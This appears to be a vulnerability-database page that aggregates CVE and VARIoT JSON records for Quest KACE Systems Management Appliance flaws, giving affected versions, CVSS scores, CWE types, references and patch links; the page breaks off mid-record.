17 vulnerabilities found for KACE Systems Management Appliance by Quest
CVE-2025-26850 (GCVE-0-2025-26850)
Vulnerability from cvelistv5 – Published: 2025-07-04 00:00 – Updated: 2025-07-08 14:36 – CWE-863 - Incorrect Authorization
| Vendor | Product | Version |
|---|---|---|
| Quest | KACE Systems Management Appliance | Affected: 0, < 14.0.97 (custom)<br>Affected: 14.1.0, < 14.1.19 (custom) |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-26850",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-07-08T13:16:37.291128Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-07-08T14:36:07.987Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "KACE Systems Management Appliance",
"vendor": "Quest",
"versions": [
{
"lessThan": "14.0.97",
"status": "affected",
"version": "0",
"versionType": "custom"
},
{
"lessThan": "14.1.19",
"status": "affected",
"version": "14.1.0",
"versionType": "custom"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:quest:kace_systems_management_appliance:*:*:*:*:*:*:*:*",
"versionEndExcluding": "14.0.97",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:quest:kace_systems_management_appliance:*:*:*:*:*:*:*:*",
"versionEndExcluding": "14.1.19",
"versionStartIncluding": "14.1.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "The agent in Quest KACE Systems Management Appliance (SMA) before 14.0.97 and 14.1.x before 14.1.19 potentially allows privilege escalation on managed systems."
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 9.3,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-863",
"description": "CWE-863 Incorrect Authorization",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-07-04T23:17:16.346Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://support.quest.com/kb/4378559/quest-response-to-kace-sma-agent-vulnerability-cve-2025-26850"
}
],
"x_generator": {
"engine": "enrichogram 0.0.1"
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2025-26850",
"datePublished": "2025-07-04T00:00:00.000Z",
"dateReserved": "2025-02-16T00:00:00.000Z",
"dateUpdated": "2025-07-08T14:36:07.987Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2025-26850 (GCVE-0-2025-26850)
Vulnerability from nvd – Published: 2025-07-04 00:00 – Updated: 2025-07-08 14:36 – CWE-863 - Incorrect Authorization
| Vendor | Product | Version |
|---|---|---|
| Quest | KACE Systems Management Appliance | Affected: 0, < 14.0.97 (custom)<br>Affected: 14.1.0, < 14.1.19 (custom) |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-26850",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-07-08T13:16:37.291128Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-07-08T14:36:07.987Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "KACE Systems Management Appliance",
"vendor": "Quest",
"versions": [
{
"lessThan": "14.0.97",
"status": "affected",
"version": "0",
"versionType": "custom"
},
{
"lessThan": "14.1.19",
"status": "affected",
"version": "14.1.0",
"versionType": "custom"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:quest:kace_systems_management_appliance:*:*:*:*:*:*:*:*",
"versionEndExcluding": "14.0.97",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:quest:kace_systems_management_appliance:*:*:*:*:*:*:*:*",
"versionEndExcluding": "14.1.19",
"versionStartIncluding": "14.1.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "The agent in Quest KACE Systems Management Appliance (SMA) before 14.0.97 and 14.1.x before 14.1.19 potentially allows privilege escalation on managed systems."
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 9.3,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-863",
"description": "CWE-863 Incorrect Authorization",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-07-04T23:17:16.346Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://support.quest.com/kb/4378559/quest-response-to-kace-sma-agent-vulnerability-cve-2025-26850"
}
],
"x_generator": {
"engine": "enrichogram 0.0.1"
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2025-26850",
"datePublished": "2025-07-04T00:00:00.000Z",
"dateReserved": "2025-02-16T00:00:00.000Z",
"dateUpdated": "2025-07-08T14:36:07.987Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
VAR-201905-1144
Vulnerability from variot – Updated: 2023-12-18 14:05. An issue was discovered in Quest KACE Systems Management Appliance before 9.1. The script at /service/kbot_service_notsoap.php is vulnerable to unauthenticated reflected XSS when user-supplied input to the METHOD GET parameter is processed by the web application. Because the application does not properly validate and sanitize this parameter, arbitrary script code can be placed into the context of the same page. Quest Software KACE Systems Management Appliance is a system management device from Quest Software, USA. The product supports IT asset management, server management and monitoring, software license management and patch management. A cross-site scripting vulnerability exists in Quest Software KACE Systems Management Appliance 9.0 and earlier that could allow an attacker to execute client-side code.
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201905-1144",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "kace systems management appliance",
"scope": "lt",
"trust": 1.8,
"vendor": "quest",
"version": "9.1"
},
{
"model": "software kace systems management appliance",
"scope": "lte",
"trust": 0.6,
"vendor": "quest",
"version": "\u003c=9.0"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-25506"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-004947"
},
{
"db": "NVD",
"id": "CVE-2019-11604"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:quest:kace_systems_management_appliance:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "9.1",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-11604"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Julien Ahrens",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201905-976"
}
],
"trust": 0.6
},
"cve": "CVE-2019-11604",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2019-11604",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2019-25506",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.1,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2019-11604",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-11604",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2019-25506",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201905-976",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-25506"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-004947"
},
{
"db": "NVD",
"id": "CVE-2019-11604"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-976"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered in Quest KACE Systems Management Appliance before 9.1. The script at /service/kbot_service_notsoap.php is vulnerable to unauthenticated reflected XSS when user-supplied input to the METHOD GET parameter is processed by the web application. Since the application does not properly validate and sanitize this parameter, it is possible to place arbitrary script code into the context of the same page. QuestSoftwareKACESystemsManagementAppliance is a system management device from QuestSoftware, USA. The product supports IT asset management, server management and monitoring, software license management and patch management. A cross-site scripting vulnerability exists in QuestSoftwareKACESystemsManagementAppliance 9.0 and earlier that could allow an attacker to execute client-side code",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-11604"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-004947"
},
{
"db": "CNVD",
"id": "CNVD-2019-25506"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-11604",
"trust": 3.0
},
{
"db": "PACKETSTORM",
"id": "153053",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2019-004947",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2019-25506",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201905-976",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-25506"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-004947"
},
{
"db": "NVD",
"id": "CVE-2019-11604"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-976"
}
]
},
"id": "VAR-201905-1144",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-25506"
}
],
"trust": 1.225
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-25506"
}
]
},
"last_update_date": "2023-12-18T14:05:09.135000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "KACE Systems Management Appliance",
"trust": 0.8,
"url": "https://www.quest.com/jp-ja/products/kace-systems-management-appliance/"
},
{
"title": "Patch for QuestSoftwareKACESystemsManagementAppliance Cross-Site Scripting Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/172815"
},
{
"title": "Quest Software KACE Systems Management Appliance Fixes for cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=92928"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-25506"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-004947"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-976"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-004947"
},
{
"db": "NVD",
"id": "CVE-2019-11604"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.6,
"url": "http://packetstormsecurity.com/files/153053/quest-kace-systems-management-appliance-9.0-cross-site-scripting.html"
},
{
"trust": 2.2,
"url": "http://seclists.org/fulldisclosure/2019/may/40"
},
{
"trust": 2.2,
"url": "https://www.rcesecurity.com/"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-11604"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-11604"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-25506"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-004947"
},
{
"db": "NVD",
"id": "CVE-2019-11604"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-976"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-25506"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-004947"
},
{
"db": "NVD",
"id": "CVE-2019-11604"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-976"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-08-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-25506"
},
{
"date": "2019-06-12T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-004947"
},
{
"date": "2019-05-24T17:29:02.633000",
"db": "NVD",
"id": "CVE-2019-11604"
},
{
"date": "2019-05-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201905-976"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-08-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-25506"
},
{
"date": "2019-06-12T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-004947"
},
{
"date": "2019-05-29T23:54:03.683000",
"db": "NVD",
"id": "CVE-2019-11604"
},
{
"date": "2019-05-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201905-976"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201905-976"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Quest Software KACE Systems Management Appliance Cross-Site Scripting Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-25506"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-976"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201905-976"
}
],
"trust": 0.6
}
}
VAR-202003-0967
Vulnerability from variot – Updated: 2023-12-18 13:47. service/krashrpt.php in Quest KACE K1000 Systems Management Appliance before 6.4 SP3 (6.4.120822) allows a remote attacker to execute code via shell metacharacters in the kuid parameter. An injection vulnerability exists in the Quest KACE K1000 Systems Management Appliance; information may be obtained, information may be tampered with, and service operation may be interrupted (DoS). Quest Software KACE K1000 Systems Management Appliance (KACE SMA) is a system management device from Quest Software, USA.
The service/krashrpt.php file in Quest Software KACE SMA 6.4 SP3 (6.4.120822) and earlier versions has a security vulnerability.
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202003-0967",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "kace systems management",
"scope": "lt",
"trust": 1.0,
"vendor": "quest",
"version": "6.4.120822"
},
{
"model": "kace systems management appliance",
"scope": "eq",
"trust": 0.8,
"vendor": "quest",
"version": "6.4 sp3 (6.4.120822)"
},
{
"model": "software quest software kace systems management appliance sp3",
"scope": "lt",
"trust": 0.6,
"vendor": "quest",
"version": "6.4(6.4.120822)"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-16728"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014852"
},
{
"db": "NVD",
"id": "CVE-2019-20504"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:quest:kace_systems_management:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "6.4.120822",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-20504"
}
]
},
"cve": "CVE-2019-20504",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2019-014852",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2020-16728",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULMON",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2019-20504",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "HIGH",
"trust": 0.1,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2019-014852",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-20504",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "JVNDB-2019-014852",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNVD",
"id": "CNVD-2020-16728",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202003-387",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULMON",
"id": "CVE-2019-20504",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-16728"
},
{
"db": "VULMON",
"id": "CVE-2019-20504"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014852"
},
{
"db": "NVD",
"id": "CVE-2019-20504"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-387"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
